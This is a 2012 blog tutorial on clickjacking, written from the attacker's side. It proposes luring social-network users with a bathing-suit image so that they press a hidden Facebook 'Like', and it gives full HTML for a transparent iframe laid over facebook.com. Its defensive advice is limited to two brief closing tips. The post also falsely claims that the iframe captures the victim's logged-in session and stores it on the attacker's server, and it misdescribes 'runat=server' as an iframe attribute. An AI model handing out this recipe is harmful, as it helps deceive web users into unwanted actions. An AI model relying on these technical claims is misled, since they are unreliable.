
January 5, 2012

Click Jacking

For all readers: clickjacking is a malicious technique of tricking Web users into revealing confidential information, or of taking control of their computer, while they click on seemingly innocuous web pages. A vulnerability across a variety of browsers and platforms, clickjacking takes the form of embedded code or script that can execute without the user's knowledge, such as when the user clicks a button that appears to perform another function.

Why do hackers want to use Click Jacking?
Say we are hackers and we want to promote our blog by pressing LIKE under our topic. Let's say the topic is very interesting, yet not enough users clicked our LIKE button. So what we will do is build a page with a nice young lady in a tiny bathing suit and a LIKE button beneath it that does nothing...
Underneath the button we will implant a transparent iframe with a button that simulates a remote LIKE on our blog.
Then all we need to do is insert the link into Facebook or another social network and wait patiently. :D

So how to start Click Jacking..

First of all you need to set up a local HTTP server: Apache, Windows 2003/2008 and more.
Go to - http://lifehacker.com/124212/geek-to-li ... web-server

Second, you need to take a little tutorial on how to build an <iframe> inside an HTML page.
Download Notepad++ from here: http://notepad-plus-plus.org
This program is a free source code editor which supports several programming languages and runs under the MS Windows environment. This means you can write HTML pages and then save them on your HTTP server as .html files, and they will run like a regular website.

Example:
We've set up an HTTP server on our localhost PC (AKA my computer). The server's root is located on one of our drives, say C:\PCusername\ (this depends on how you set up the ROOT for your server).
Now all you need to do is open Notepad++, "develop" a client-side HTML <iframe> and save it with the .html extension
IN YOUR ROOT DIRECTORY!
Then when you open your server with your browser the address will be http://localhost/myJack.html

Next we need the page to display some data to the victim and on the same place in the page 
we will implant a transparent frame of our choice, and while pressing the data the victim sees, the page will operate 
the iframe behind it at the same time, making the Jacking without the victim's notice. 


<iframe> example and how to build an HTML page

<html> <!-- HTML tag to start building the page -->
<head> <!-- Page header (too soon for you, just copy it) -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Clickjacking example</title> <!-- Title for the browser's label -->
</head> <!-- End of header -->
<body> <!-- Body tag says that the page data (body) will start from here -->
<!-- Div tag is usually for placing the object in the page at a certain order -->
<div style="z-index:2; position:absolute;top:0; left:0;width: 70%; height:70%">
<!-- %% HERE IS THE IFRAME %% -->
<iframe runat="server" src="http://www.facebook.com/home.php?" id="frame1" style="opacity:0.4;filter:alpha(opacity=40); " width="100%" height="100%" onmouseover="this.style.opacity=.5;this.filters.alpha.opacity=50" onmouseout="this.style.opacity=0;this.filters.alpha.opacity=0"></iframe>
</div>
<div align="right" style="position:absolute; top:0; left:0; z-index:1; width: 70%;height:70%; background-color: yellow;text-align:left;">
<font size="3"><p>
<strong>This is an example of how a simple clickjacking attack is done by a malicious site. </strong><br /> <!-- Visible text shown to the visitor -->
Text Text Text Text Text Text Text Text</p></font>
</div>
</body>
</html>

Now look carefully inside the code and follow my lead: COPY means writing the same, NOT copy-paste!!
Start with the HTML page tag (<html>); after it comes the page header (<head>), copy it. Open a BODY tag (<body>) and copy the Div tag with its statements.
Now copy the Iframe step by step and you'll see that Notepad++ colours the tags if you do it right.
The Iframe contains 'src', which stands for Source (that's where the victim will be redirected), a 'style' for colours and pixels, 'runat', which means "run at" and whose only option is the 'server' value, and a method to operate while using this object (onmouseover).
After that close the Div tag and open a new one for the Text. Insert the Text and close the page like this:
</body></html>

*Our victim is already logged into Facebook, so the redirection to the login page will automatically input the victim's
session in order to bypass the login authentication, and at the same time save the session on the attacker's server.

onmouseover - http://www.w3schools.com/jsref/event_onmouseover.asp 
*read about 'onmouseout' also
Session - is the period of activity between a user logging in and logging out of a (multi-user) system.

That's it! Your page is ready! Save it in your HTTP server's ROOT directory and open it with your browser.

You'll see that there is a yellow section inside your page with your "Text Text Text Text..."
And if you move your mouse over it, the iframe will appear as the page's opacity changes.
In real Jacking there won't be any opacity and the victim won't see the Facebook frame.

Contact me privately to see the final pictures.

Avoiding becoming a victim of such attacks: 

1) Log off your accounts before you go surfing/clicking around on random sites you don't know/trust.
2) Avoid random links sent to you (in a message, email, etc).

Cheers,

Ce@ser
